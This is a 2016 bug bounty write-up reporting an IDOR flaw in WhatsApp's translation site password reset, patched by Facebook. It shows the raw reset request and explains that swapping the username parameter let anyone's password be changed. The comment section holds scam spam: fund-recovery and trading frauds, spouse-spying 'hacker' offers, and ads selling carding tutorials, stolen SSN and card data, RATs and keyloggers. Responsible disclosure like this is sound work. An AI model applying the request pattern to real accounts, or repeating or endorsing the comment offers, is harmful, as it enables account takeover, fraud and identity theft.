Tuesday 24 May 2016

How I could have hacked Anyone's whatsapp translate account .

In the name of Allah the beneficent the Merciful.


It was a thursday night (day before my semester exam) when i came to know that whatsapp is now a part of Facebook bug bounty and started hunting
on it.
 Soon i discovered an account takeover Flaw in whatsapp translate website
translate.whatsapp.com .

Whatsapp translate has more than 10 million of it's users in all over the world.

The bug was Insecure Direct Object Reference in password reset functionality.

Here is the POST request :




POST /reset HTTP/1.1
Host: translate.whatsapp.com
Connection: keep-alive
Content-Length: 164
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://translate.whatsapp.com/
Upgrade-Insecure-Requests: 1
User-Agent:
 Referer: https://translate.whatsapp.com/reset?id=0eebabde1b2144a4942b54ad22393982
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __utmt=1;

csrfmiddlewaretoken=&password=&password_again=&username=&hash_id=0eebabde1b2144a4942b54ad22393982





The parameter "username" was vulnerable which could have let me changed
anyone's password .

Here Insecure Direct object Reference (IDOR) could be exploited in username parameter to gain control of anyone's whatsapp translate account.


Just by replacing the username with victim's username it's Game over!!!


Here is the video POC.

VIDEO

Facebook fixed the issue in production within 2 hours of acknowledgment




and rewarded $1000 USD for my work.





Now it's no more possible to exploit the IDOR here which was affecting more than 10 million users.



Timeline :


May 13, 2016 at 1:07 AM  : Bug Reported

May 18, 2016 at 12:11 AM : Escalated by Facebook

May 18, 2016 at 2:27 AM  : Bug fixed and asked for Confirmation .
   
May 25, 2016 at 5:18 AM  :  Bounty Rewarded. 



I would like to Thanks Facebook Security for quick fix of issue in production server and as usual happy to save the community from getting hacked.

Thanks for Reading
Jai Hind  :) 
 
 
 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0 





Posted by at

7 comments:

  1. Naveed Mughal3 May 2018 at 07:54

    Nice blog and absolutely outstanding. You can do something much better but i still say this perfect.Keep trying for the best.
    Certified Translation company

    ReplyDelete
  2. Dare guld30 January 2020 at 14:33

    I rarely share my story with people, not only because it put me at the lowest point ever but because it made me a person of ridicule among family and friends. I put all I had into Binary Options ($690,000) after hearing great testimonies about this new investment

     strategy. I was made to believe my investment would triple, it started good and I got returns (not up to what I had invested). Gathered more and involved a couple family members, but I didn't know I was setting myself up for the kill, in less than no time all we had put ($820,000) was gone. It almost seem I had set them up, they came at me strong and hard. After searching and looking for how to make those scums pay back, I got introduced to maryshea03@gmail.com to WhatsApp her +15623847738.who helped recover about 80% of my lost funds within a month.

    ReplyDelete
  3. martins11 February 2020 at 01:06


    I was scrolling through a binary option group ,then i saw a post by Harry Brown about Forex and binary trading and how i could earn much more than i can imagine, i got in touch with him and he made every step clear to me and how his strategy would work magic. and it really did!! i got $7080 my first week after i invested just $300 if you are having difficulties in trading, she can also manage your broker account,which you will also have your ACCESS LOGIN so as to enable you to check your trade records and balance DAILY contact MR HARRY BROWN through Email: (loomstocks7@gmail.com)

    ReplyDelete
  4. Samuel5 June 2020 at 18:17

    An hacker helped me to spy on my wife’s WhatsApp,mails and every text message that was sent to her iPhone and every deleted messages of the past six months you can message him through this number (+13852501115) or contact him via email at brillianthackers800@gmail.com

    ReplyDelete
  5. No Name12 December 2020 at 17:19

    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ALL TUTORIALS AVAILABLE FOR SPAMMING, CARDING, CASHOUTS, MOBILE DEPOSITS

    -->SPAMMING price == 200$
    >What you need to start spam

    -->CARDING price == 300$ (Includes All Carding)

    (How to use eBay Carding, Amazon Carding, Adidas Carding )

    >APPLE PAY & ANDROID TAP CASH

    >BANK TRANSFER

    >BITCOIN CARDING

    >WALMART CARDING

    -->DUMPS+PINS price == 85$
    (How to use & create dumps with pins track 1 & 2)
    >HOW TO CASHOUT DUMPS+PINS

    >MOBILE DEPOSIT
    >SAFE SOCKS5 (USA)
    >WESTERN UNION CARDING
    >WORLD REMIT CARDING METHOD

    -->SMTP Linux Root
    *--price ==150$--*

    Also SELLING

    >SERVER I.P's price == 200$ in bulk
    >USA EMAILS with Passwords price ==150$ in bulk
    >SSN Fullz with Driving license price == 2$ each

    **Contact 24/7**
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  6. Unknown31 December 2020 at 03:24

    Really appreciated! I was stuck with it but after reading this post I got my answer. This post is written in well-mannered and simple words are used so that one can easily understand it.https://developement.design/forum/Thread-how-to-clear-netflix-viewing-history-on-laptops | Netflix is not connecting on TV | How to cancel Netflix Subscription

    ReplyDelete
  7. Cool Stuff21 May 2022 at 20:07

    LEGIT FULLZ & TOOLS STORE

    Hello to All !

    We are offering all types of tools & Fullz on discounted price.
    If you are in search of anything regarding fullz, tools, tutorials, Hack Pack, etc
    Feel Free to contact

    ***CONTACT 24/7***
    **Telegram > @leadsupplier
    **ICQ > 752822040
    **Skype > Peeterhacks
    **Wicker me > peeterhacks

    "SSN LEADS/FULLZ AVAILABLE"
    "TOOLS & TUTORIALS AVAILABLE FOR HACKING, SPAMMING,
    CARDING, CASHOUT, CLONING, SCRIPTING ETC"

    **************************************
    "Fresh Spammed SSN Fullz info included"
    >>SSN FULLZ with complete info
    >>CC With CVV (vbv & non vbv) Fullz USA
    >>FULLZ FOR SBA, PUA & TAX RETURN FILLING
    >>USA I.D Photos Front & Back
    >>High Credit Score fullz (700+ Scores)
    >>DL number, Employee Details, Bank Details Included
    >>Complete Premium Info with Relative Info

    ***************************************
    COMPLETE GUIDE FOR TUTORIALS & TOOLS

    "SPAMMING" "HACKING" "CARDING" "CASH OUT"
    "KALI LINUX" "BLOCKCHAIN BLUE PRINTS" "SCRIPTING"
    "FRAUD BIBLE"

    "TOOLS & TUTORIALS LIST"
    =>Ethical Hacking Ebooks, Tools & Tutorials
    =>Bitcoin Hacking
    =>Kali Linux
    =>Fraud Bible
    =>RAT
    =>Keylogger & Keystroke Logger
    =>WhatsApp Hacking & Hacked Version of WhatsApp
    =>Facebook & Google Hacking
    =>Bitcoin Flasher
    =>SQL Injector
    =>Premium Logs (PayPal/Amazon/Coinbase/Netflix/FedEx/Banks)
    =>Bitcoin Cracker
    =>SMTP Linux Root
    =>Shell Scripting
    =>DUMPS with pins track 1 and 2 with & without pin
    =>SMTP's, Safe Socks, Rdp's brute
    =>PHP mailer
    =>SMS Sender & Email Blaster
    =>Cpanel
    =>Server I.P's & Proxies
    =>Viruses & VPN's
    =>HQ Email Combo (Gmail, Yahoo, Hotmail, MSN, AOL, etc.)

    *Serious buyers will always welcome
    *Price will be reduce in bulk order
    *Discount offers will give to serious buyers
    *Hope we do a great business together

    ===>Contact 24/7<===
    ==>Telegram > @leadsupplier
    ==>ICQ > 752822040
    ==>Skype > Peeterhacks
    ==>Wicker me > peeterhacks

    ReplyDelete

Subscribe to: Post Comments (Atom)